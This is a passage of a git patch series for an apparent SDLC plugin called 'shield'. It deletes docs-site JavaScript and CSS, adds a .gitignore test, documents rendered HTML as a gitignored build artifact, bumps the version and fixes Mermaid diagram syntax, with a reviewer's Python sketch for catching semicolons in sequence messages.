-      ARTIFACTS.forEach(function (a) {
-        if (f.artifacts && f.artifacts[a[0]] && (!q || fm || a[1].toLowerCase().indexOf(q) !== -1)) {
-          docs.push({ label: a[1], href: root + f.name + "/" + a[2], tag: a[3] });
-        }
-      });
-      var reviews = [];
-      ["prd", "plan", "code"].forEach(function (rt) {
-        var rv = f.reviews && f.reviews[rt];
-        if (rv && rv.entries) {
-          rv.entries.forEach(function (en) {
-            var label = rt + " review · " + en.date;
-            if (!q || fm || label.toLowerCase().indexOf(q) !== -1) {
-              reviews.push({ label: label, href: root + en.path });
-            }
-          });
-        }
-      });
-      if (docs.length || reviews.length) out.push({ name: f.name, docs: docs, reviews: reviews });
-    });
-    return out;
-  }
-
-  // Export pure logic for unit tests (Node). Browsers load this as a classic
-  // script where `module` is undefined, so this branch is a no-op there.
-  if (typeof module !== "undefined" && module.exports) {
-    module.exports = { crumbModel: crumbModel, filterFeatures: filterFeatures, titleize: titleize };
-  }
-
-  // Below here is browser-only DOM wiring.
-  if (typeof document === "undefined") return;
-
-  function el(tag, cls, html) {
-    var e = document.createElement(tag);
-    if (cls) e.className = cls;
-    if (html != null) e.innerHTML = html;
-    return e;
-  }
-
-  function renderCrumb(model) {
-    var crumb = document.getElementById("shield-crumb");
-    if (!crumb) return;
-    crumb.innerHTML = "";
-    model.forEach(function (seg, i) {
-      if (i) crumb.appendChild(el("span", "chev", "›"));
-      if (seg.href) {
-        var a = el("a", seg.active ? "here" : null, seg.label);
-        a.setAttribute("href", seg.href);
-        crumb.appendChild(a);
-      } else {
-        crumb.appendChild(el("span", seg.active ? "here" : null, seg.label));
-      }
-    });
-  }
-
-  function renderResults(model, container) {
-    container.innerHTML = "";
-    if (!model.length) { container.appendChild(el("div", "docs-empty", "No docs match")); return; }
-    model.forEach(function (f) {
-      container.appendChild(el("div", "feat-name", f.name));
-      f.docs.forEach(function (d) {
-        var a = el("a", "doc", d.label + '<span class="tag">' + d.tag + "</span>");
-        a.setAttribute("href", d.href);
-        container.appendChild(a);
-      });
-      f.reviews.forEach(function (r) {
-        var a = el("a", "doc rev", "↳ " + r.label);
-        a.setAttribute("href", r.href);
-        container.appendChild(a);
-      });
-    });
-  }
-
-  document.addEventListener("DOMContentLoaded", function () {
-    var root = document.body.dataset.shieldRoot || "";
-    renderCrumb(crumbModel(location.pathname, root));
-
-    var btn = document.getElementById("docs-toggle");
-    var panel = document.getElementById("docs-panel");
-    var search = document.getElementById("docs-search");
-    var results = document.getElementById("docs-results");
-    if (!btn || !panel || !search || !results) return;
-
-    function paint() { renderResults(filterFeatures(window.SHIELD_MANIFEST, search.value, root), results); }
-    function open() {
-      panel.classList.add("open"); btn.setAttribute("aria-expanded", "true");
-      search.value = ""; paint(); search.focus();
-    }
-    function close() { panel.classList.remove("open"); btn.setAttribute("aria-expanded", "false"); }
-
-    btn.addEventListener("click", function (e) {
-      e.stopPropagation();
-      panel.classList.contains("open") ? close() : open();
-    });
-    search.addEventListener("input", paint);
-    search.addEventListener("click", function (e) { e.stopPropagation(); });
-    document.addEventListener("keydown", function (e) {
-      if (e.key === "Escape") close();
-      if ((e.metaKey || e.ctrlKey) && e.key.toLowerCase() === "k") { e.preventDefault(); open(); }
-    });
-    document.addEventListener("click", function (e) {
-      if (!e.target.closest(".feat-wrap")) close();
-    });
-  });
-})();
diff --git a/docs/shield/shield.css b/docs/shield/shield.css
deleted file mode 100644
index 6ea3b4bf..00000000
--- a/docs/shield/shield.css
+++ /dev/null
@@ -1,81 +0,0 @@
-:root {
-  --accent:#1a73e8; --bg:#ffffff; --panel:#f7f9fc; --text:#1f1f1f;
-  --muted:#5a6370; --border:#e4e8ee; --green:#3fb950; --green-bg:#e9f7ee;
-}
-* { box-sizing:border-box; }
-body { margin:0; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",system-ui,sans-serif;
-  line-height:1.6; color:var(--text); background:var(--bg); }
-/* Header — breadcrumb + Features panel */
-.shield-header { display:flex; align-items:center; gap:12px; padding:10px 18px;
-  border-bottom:1px solid var(--border); background:#fff; position:sticky; top:0; z-index:50; font-size:.92rem; }
-.shield-header .brand { font-weight:700; color:var(--text); text-decoration:none; white-space:nowrap; }
-.shield-header .bar-sep { color:#9aa3af; }
-.crumb { color:var(--muted); white-space:nowrap; overflow:hidden; text-overflow:ellipsis; }
-.crumb a { color:var(--muted); text-decoration:none; }
-.crumb a:hover { color:var(--accent); }
-.crumb .chev { color:#c2c8d0; margin:0 5px; }
-.crumb .here { color:var(--accent); font-weight:600; }
-.bar-spacer { flex:1; }
-.feat-wrap { position:relative; }
-.feat-btn { cursor:pointer; border:1px solid var(--border); background:var(--panel);
-  color:var(--accent); border-radius:6px; padding:5px 12px; font-size:.92rem; white-space:nowrap; }
-.feat-btn:hover { border-color:var(--accent); }
-.feat-panel { display:none; position:absolute; right:0; top:115%; width:330px; background:#fff;
-  border:1px solid var(--border); border-radius:10px; box-shadow:0 10px 30px rgba(0,0,0,.12);
-  padding:10px; max-height:74vh; overflow:auto; }
-.feat-panel.open { display:block; }
-.docs-search { width:100%; border:1px solid var(--border); border-radius:7px; padding:8px 10px;
-  font-size:.85rem; outline:none; }
-.docs-search:focus { border-color:var(--accent); }
-.feat-name { font-weight:600; font-size:.82rem; margin:10px 4px 2px; color:var(--text); }
-.doc { display:flex; align-items:center; gap:8px; padding:5px 8px 5px 14px; border-radius:6px;
-  color:var(--accent); text-decoration:none; font-size:.85rem; }
-.doc:hover { background:var(--panel); }
-.doc .tag { margin-left:auto; font-size:.62rem; color:var(--muted); background:var(--panel);
-  border:1px solid var(--border); border-radius:10px; padding:0 6px; text-transform:uppercase; }
-.doc.rev { color:var(--muted); padding-left:22px; }
-.docs-empty { color:var(--muted); font-size:.8rem; padding:8px 6px; }
-/* Main content */
-.shield-main { max-width:960px; margin:0 auto; padding:36px 28px 96px; }
-h1,h2,h3,h4 { color:var(--accent); line-height:1.25; }
-h1 { font-size:2rem; border-bottom:2px solid var(--accent); padding-bottom:8px; margin-bottom:24px; }
-h2 { font-size:1.45rem; margin-top:40px; padding-top:12px; border-top:1px solid var(--border); }
-h3 { font-size:1.15rem; margin-top:28px; }
-h4 { font-size:1rem; color:var(--text); margin-top:20px; }
-p,ul,ol { margin:12px 0; } li { margin:4px 0; }
-table { border-collapse:collapse; width:100%; margin:16px 0; font-size:.94rem; }
-th,td { padding:8px 12px; border:1px solid var(--border); text-align:left; vertical-align:top; }
-th { background:var(--panel); font-weight:600; }
-tr:nth-child(even) td { background:#fbfcfd; }
-blockquote { border-left:3px solid var(--accent); margin:16px 0; padding:4px 16px;
-  color:var(--muted); background:var(--panel); }
-code { background:#f1f3f6; padding:2px 6px; border-radius:3px;
-  font-family:"JetBrains Mono","SF Mono",Consolas,monospace; font-size:.9em; }
-pre { background:var(--panel); padding:12px 16px; border-radius:6px; overflow-x:auto;
-  border:1px solid var(--border); }
-pre.mermaid { background:transparent; border:none; padding:0; text-align:center; }
-a { color:var(--accent); }
-hr { border:none; border-top:1px solid var(--border); margin:32px 0; }
-.toc,.meta-banner { background:var(--panel); border:1px solid var(--border);
-  border-left:3px solid var(--accent); border-radius:6px; padding:16px 20px; margin-bottom:28px; font-size:.94rem; }
-.toc-title { font-weight:600; margin-bottom:6px; }
-.shield-footer { max-width:960px; margin:0 auto; padding:24px 28px; color:var(--muted);
-  font-size:.85rem; border-top:1px solid var(--border); }
-/* Dashboard */
-.dash-grid { display:grid; grid-template-columns:repeat(auto-fill,minmax(280px,1fr)); gap:16px; }
-.dash-card { border:1px solid var(--border); border-radius:8px; padding:16px; background:#fff; }
-.dash-card h3 { margin:0 0 4px; color:var(--text); font-size:1.05rem; }
-.dash-card .date { color:var(--muted); font-size:.8rem; }
-.dash-links { display:flex; flex-wrap:wrap; gap:8px; margin-top:10px; }
-.dash-links a { font-size:.85rem; border:1px solid var(--border); border-radius:6px;
-  padding:3px 9px; text-decoration:none; }
-.pipeline { display:flex; gap:4px; margin-top:10px; font-size:.72rem; }
-.pipe-step { border-radius:8px; padding:1px 7px; background:#f1f3f6; color:var(--muted); }
-.pipe-step.done { background:var(--green-bg); color:var(--green); }
-.badge { display:inline-block; background:var(--green-bg); color:var(--green);
-  border-radius:12px; padding:.1em .6em; font-size:.75rem; font-weight:600; }
-.dash-empty { color:var(--muted); padding:40px; text-align:center; }
-/* Plan story components */
-.story { border:1px solid var(--border); border-radius:8px; padding:20px; margin:25px 0; }
-.epic-meta { background:var(--panel); border:1px solid var(--border); border-radius:8px; padding:15px 20px; margin:20px 0; }
-.milestone { margin:16px 0; padding:12px 16px; border-left:3px solid var(--accent); background:var(--panel); }
diff --git a/shield/scripts/test_gitignore_html_artifacts.py b/shield/scripts/test_gitignore_html_artifacts.py
new file mode 100644
index 00000000..dc96b716
--- /dev/null
+++ b/shield/scripts/test_gitignore_html_artifacts.py
@@ -0,0 +1,29 @@
+"""Eval: .gitignore demotes Shield HTML to a build artifact."""
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]  # repo root
+GITIGNORE = ROOT / ".gitignore"
+
+REQUIRED_PATTERNS = [
+    "**/docs/shield/*/outputs/",
+    "**/docs/shield/index.html",
+    "**/docs/shield/manifest.js",
+]
+
+
+def test_gitignore_has_html_artifact_rules():
+    text = GITIGNORE.read_text()
+    for pat in REQUIRED_PATTERNS:
+        assert pat in text, f".gitignore missing rule: {pat}"
+
+
+def test_no_shield_html_tracked():
+    out = subprocess.run(
+        ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"],
+        cwd=ROOT, capture_output=True, text=True, check=True,
+    )
+    tracked = [line for line in out.stdout.splitlines() if line.strip()]
+    assert tracked == [], f"HTML/assets still tracked: {tracked}"

From 2285ea99249d7215dcdcc83785f76503216cc07f Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:28:18 +0000
Subject: [PATCH 07/10] docs(shield): describe HTML output as a gitignored
 build artifact

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 shield/docs/artifacts.md                 | 4 ++--
 shield/hooks/scripts/session-start.sh    | 2 +-
 shield/schema/output-paths.yaml          | 3 +++
 shield/skills/general/manifest-schema.md | 2 +-
 4 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/shield/docs/artifacts.md b/shield/docs/artifacts.md
index 04fe2f4b..b00c5927 100644
--- a/shield/docs/artifacts.md
+++ b/shield/docs/artifacts.md
@@ -19,7 +19,7 @@ Top-level dashboard. Renders `manifest.json` as a card grid linking to every fea
 
 ## Per-feature (one per feature folder)
 
-Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML sits alongside under `outputs/`.
+Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML lands under `outputs/` (build artifact — gitignored; rebuild locally with `/shield render`).
 
 ### `research.md`
 
@@ -71,7 +71,7 @@ Markdown rendering of `plan.json` for human readers. Generated alongside `plan.j
 
 ### `outputs/{prd,plan,trd}.html`
 
-Rendered HTML siblings of the source markdown. Regenerated on every write of the corresponding source file.
+Rendered HTML siblings of the source markdown — local build artifact, gitignored. Rebuild with `/shield render` (regenerates the whole site).
 
 ## Reviews
 
diff --git a/shield/hooks/scripts/session-start.sh b/shield/hooks/scripts/session-start.sh
index 20f4ace3..ee35c847 100755
--- a/shield/hooks/scripts/session-start.sh
+++ b/shield/hooks/scripts/session-start.sh
@@ -132,7 +132,7 @@ ${PM_MCP_WARNING:+
 ${INCOMPLETE_STEPS_WARNING:+
 ⚠ ${INCOMPLETE_STEPS_WARNING}}
 
-**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\`. Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.)
+**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\` (build artifact — gitignored; rebuild locally with \`/shield render\`). Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.)
 
 **Skill domains:** ${DOMAIN_SKILLS}
 ${DOMAIN_SKIP:+**Skip skills from:** ${DOMAIN_SKIP} (not relevant to this project)}
diff --git a/shield/schema/output-paths.yaml b/shield/schema/output-paths.yaml
index ffb425fa..2c30da30 100644
--- a/shield/schema/output-paths.yaml
+++ b/shield/schema/output-paths.yaml
@@ -1,3 +1,6 @@
+# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and
+# regenerated on demand by /shield render (scripts/render-output.sh). The
+# committed source of truth is the corresponding Markdown (+ JSON sidecars).
 # shield/schema/output-paths.yaml
 # Plugin-owned contract. Consumers should NOT edit.
 # See docs/superpowers/specs/2026-05-22-shield-output-structure-design.md §5.
diff --git a/shield/skills/general/manifest-schema.md b/shield/skills/general/manifest-schema.md
index db944292..4d7a4411 100644
--- a/shield/skills/general/manifest-schema.md
+++ b/shield/skills/general/manifest-schema.md
@@ -63,7 +63,7 @@ Lives at `{output_dir}/manifest.json`. This is the source of truth for which fea
   - `plan_json` → `{plan_json}` = `{feature_dir}/plan.json`
   - `plan_md` → `{plan_md}` = `{feature_dir}/plan.md`
   - `plan_arch_md` → `{plan_arch_md}` = `{feature_dir}/plan-architecture.md`
-  Each is `true` if the file exists, `false` if not. Rendered HTML siblings under `{feature_dir}/outputs/` are implied by the source presence and not tracked separately.
+  Each is `true` if the file exists, `false` if not. Rendered HTML siblings land under `{feature_dir}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`) and are implied by the source presence, not tracked separately.
 - **`features[].reviews`** — one entry per review type (`prd`, `plan`, `code`). Each:
   - `latest`: the highest-sorted date-keyed run folder name (e.g. `2026-03-21_2`)
   - `count`: number of run folders under `{feature_dir}/reviews/<type>/`

From 67355e3c3cb8d4bed0fac34e201049cf269b54ce Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:28:47 +0000
Subject: [PATCH 08/10] =?UTF-8?q?chore(shield):=20bump=20to=202.28.0=20?=
 =?UTF-8?q?=E2=80=94=20Markdown-canonical=20output=20+=20/shield=20render?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .claude-plugin/marketplace.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json
index e17b31a8..9b52973a 100644
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -9,7 +9,7 @@
     {
       "name": "shield",
       "description": "Unified SDLC plugin \u2014 research, planning, PM integration, implementation, and continuous review with multi-domain support and specialist agents",
-      "version": "2.27.0",
+      "version": "2.28.0",
       "source": "./shield",
       "category": "development"
     },

From 521f21307489aa4dbf88eda417b0ce91113d2a00 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 18:02:33 +0530
Subject: [PATCH 09/10] fix(shield): mermaid sequence syntax error in
 backlog-store LLD

Parentheses in a sequenceDiagram participant alias ("caller (/backlog add
or skill)") break Mermaid's parser ("Syntax error in text"). Rephrase the
alias without parens. Fixed in both the canonical docs/lld/ copy and the
docs/shield/ draft.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/lld/backlog-store.md                         | 2 +-
 docs/shield/backlog-20260527/lld-backlog-store.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md
index 4e0d01fa..34a74ee7 100644
--- a/docs/lld/backlog-store.md
+++ b/docs/lld/backlog-store.md
@@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls.
 
 ```mermaid
 sequenceDiagram
-  participant C as caller (/backlog add or skill)
+  participant C as caller via /backlog add or skill
   participant S as backlog_store
   participant FS as filesystem
   C->>S: capture(text, ..., source)
diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md
index 4c74de09..4c5e8660 100644
--- a/docs/shield/backlog-20260527/lld-backlog-store.md
+++ b/docs/shield/backlog-20260527/lld-backlog-store.md
@@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls.
 
 ```mermaid
 sequenceDiagram
-  participant C as caller (/backlog add or skill)
+  participant C as caller via /backlog add or skill
   participant S as backlog_store
   participant FS as filesystem
   C->>S: capture(text, ..., source)

From b0d8dd3b00417a23d7fc471e9aa7cf9223d08450 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 18:14:40 +0530
Subject: [PATCH 10/10] =?UTF-8?q?fix(shield):=20real=20mermaid=20parse=20e?=
 =?UTF-8?q?rror=20=E2=80=94=20semicolon=20in=20sequence=20message?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

GitHub's parser pinned the error to diagram line 10: the ';' in
"append entry (...); validate in-memory doc" is treated as a statement
separator, so Mermaid tries to parse "validate in-memory doc" as a new
statement and fails expecting an arrow. Replace ';' with 'then'. (The
earlier alias-parens change was not the cause.)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/lld/backlog-store.md                         | 2 +-
 docs/shield/backlog-20260527/lld-backlog-store.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
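
Reviewer note (not part of the commit): the failure mode described in the
message above can be caught before pushing with a small check. What follows
is a minimal sketch, not Shield code. The function name
find_semicolon_messages is hypothetical, the arrow regex covers only simple
"A->>B: text" lines, and it assumes Mermaid's documented entity codes (for
example #59;) are the accepted way to keep a semicolon in message text.

```python
from __future__ import annotations

import re

FENCE = "`" * 3  # built at runtime so this snippet never contains a raw fence line
# Simplified matcher for "A->>B: text" style lines; real Mermaid accepts more forms.
ARROW_MESSAGE = re.compile(r"^\s*\w+\s*--?(?:>>|>|x|\))[+-]?\s*\w+\s*:(?P<msg>.*)$")
ENTITY = re.compile(r"#\w+;")  # entity codes such as #59; end in ';' but are not separators


def find_semicolon_messages(markdown: str) -> list[tuple[int, str]]:
    """Return (diagram_line, text) for sequence messages containing a raw ';'."""
    hits = []
    in_fence = False
    is_sequence = False
    diagram_line = 0
    for raw in markdown.splitlines():
        stripped = raw.strip()
        if not in_fence:
            if stripped == FENCE + "mermaid":
                in_fence, is_sequence, diagram_line = True, False, 0
            continue
        if stripped == FENCE:
            in_fence = False
            continue
        diagram_line += 1
        if diagram_line == 1:
            # Assumes the diagram type is declared on the first line of the block.
            is_sequence = stripped.startswith("sequenceDiagram")
            continue
        if not is_sequence:
            continue
        match = ARROW_MESSAGE.match(raw)
        if match and ";" in ENTITY.sub("", match.group("msg")):
            hits.append((diagram_line, stripped))
    return hits


sample = "\n".join([
    FENCE + "mermaid",
    "sequenceDiagram",
    "  participant S as backlog_store",
    "  S->>S: append entry; validate doc",
    "  S->>S: append entry then validate doc",
    FENCE,
])
print(find_semicolon_messages(sample))
```

Only the message with the raw ';' is reported, along with its line number
inside the diagram, which is the same kind of position GitHub's parser
reports. Participant aliases with parentheses are deliberately not flagged,
since this commit found they were not the cause.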

diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md
index 34a74ee7..535b49d3 100644
--- a/docs/lld/backlog-store.md
+++ b/docs/lld/backlog-store.md
@@ -111,7 +111,7 @@ sequenceDiagram
   alt malformed
     S-->>C: raise BacklogInvalid
   else ok
-    S->>S: append entry (uuid4 id, next order); validate in-memory doc
+    S->>S: append entry (uuid4 id, next order) then validate in-memory doc
     S->>FS: write backlog.json.tmp (full doc) + fsync
     S->>FS: re-check on-disk version/count (compare-before-replace)
     alt store changed underneath
diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md
index 4c5e8660..0f7b40eb 100644
--- a/docs/shield/backlog-20260527/lld-backlog-store.md
+++ b/docs/shield/backlog-20260527/lld-backlog-store.md
@@ -111,7 +111,7 @@ sequenceDiagram
   alt malformed
     S-->>C: raise BacklogInvalid
   else ok
-    S->>S: append entry (uuid4 id, next order); validate in-memory doc
+    S->>S: append entry (uuid4 id, next order) then validate in-memory doc
     S->>FS: write backlog.json.tmp (full doc) + fsync
     S->>FS: re-check on-disk version/count (compare-before-replace)
     alt store changed underneath